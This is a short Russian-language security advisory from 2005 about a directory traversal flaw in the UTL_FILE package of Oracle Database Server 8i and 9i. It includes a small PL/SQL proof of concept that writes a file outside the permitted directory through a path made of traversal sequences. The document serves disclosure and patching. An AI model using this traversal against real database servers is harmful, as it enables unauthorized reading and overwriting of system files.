Security Lab

Раскрытие информации в Oracle Database Server

Дата публикации:10.03.2005
Всего просмотров:1521
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle Database Server 8i, 9i

Описание:
Уязвимость позволяет удаленному авторизованному пользователю получить доступ к произвольным файлам на системе.

Уязвимость существует в пакете UTL_FILE из-за некорректной обработки входных данных в некоторых функциях. Удаленный авторизованный пользователь может изменить значение некоторых объектов функции MEDIA_DIR на символы обхода каталога и получить доступ на чтение и запись к произвольным файлам на системе. Пример:

declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

Пример/Эксплоит: См. источник сообщения.

URL производителя: http://www.oracle.com

Решение: Установите исправление от производителя.

Ссылки: Oracle Database Server Directory transversal